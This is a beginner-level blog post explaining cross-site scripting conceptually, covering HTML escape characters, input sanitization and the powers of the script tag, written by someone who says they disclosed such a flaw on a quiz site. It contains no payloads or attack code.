---
title: "What is XSS?"
layout: post
---

I found a cross-site scripting (XSS) attack
in a well-known quiz hosting website.
I disclosed the vulnerability to them years ago, so I thought
now might be a good time to write about it.

In this first article I will explain what XSS is.

In the next article I will explain how I found this attack. 

## What is cross-site scripting (XSS)

Cross-site scripting, XSS for short,
is a technique to execute arbitrary Javascript code on a user visiting a website
by linking to Javascript code stored on another server.

So for example:

I have a file on my website called [hacked.js](/assets/js/hacked.js).
If I was able to run this javascript file on anybody visiting a certain website *that is not mine*, this would be called cross-site scripting.

Click the above `hacked.js` link to view the code I use to "hack" this website.
It's safe, I promise ;)

Now, how can we get this code to execute when a user visits this site?
To explain, I will start with some of the underlying technologies.

### Escape Characters!

No, this is not a Sherlock Holmes novel!

If we suppose that a website is built with sequences like these (called "tags"):
`<body>`, `<p>` (for paragraph), `<link>` and `<b>` for bold,
then why can you *see* the left and right angle bracket characters?
Don't they mean something? Shouldn't they be telling the browser:
*"Hey! Make me bold!"?*
Why *doesn't* everything after me typing `<b>` turn bold?

The answer is:

There are special characters in HTML to type a visible left (&lt;)
and visible right angle bracket (&gt;) in a website.
If I use the left and right brackets on my keyboard however,
things will indeed <b>show up bold</b>.

This is the code for the sentence I wrote above:
<pre class="terminal">
There are special characters in HTML to type a visible left (&amp;lt;)
and visible right angle bracket (&amp;gt;) in a website.
If I use the left and right brackets on my keyboard however,
things will indeed &lt;b&gt;show up bold&lt;/b&gt;.
</pre>

Notice how all visible left angle brackets use an `&lt;` to show them?

These are called [escape characters](https://en.wikipedia.org/wiki/Escape_character).
They tell a system, in this case your web browser:
*"Hello! Please show me off! I don't want to be hidden."*

#### Sanitization

Most of the time XSS attacks are done using poorly sanitized HTML `<input>` elements.

Sanitization is when a program (usually on the server side),
will remove characters like `<` and replace them with the aforementioned "escape characters".
Internally this would be something like `&lt;`,
but they would show up to a user as `<`.

When inputs are not properly sanitized *and* the input is shown to the user in another part of the website,
then a malicous user can type in HTML that will run whenever anybody tries to look at what they typed.

HTML, by itself is not very dangerous.
The worst thing you could do is probably put a link on your name,
and then point it to a porn site.
Make your name bold, italic. Maybe make the background a funny color.
Although this may annoy your victim it is not dangerous security wise.

There is one tag however, that *is* scary...

## `<script>`

The `<script>` tag allows you to write code that can:

1. Change the page contents.
2. Redirect the user to a new page automatically.
3. Get a user's location.
4. Open a user's microphone/webcam.
5. With the `src` [attribute](https://www.w3schools.com/htmL/html_attributes.asp) you can also load a script from another site. (This is XSS)

Those last two will ask for permission from the user (if their browser isn't insanely insecure).

In my next article I'll talk about a website I found which is vulnerable to this attack.
And, show you how you can run your own XSS attack.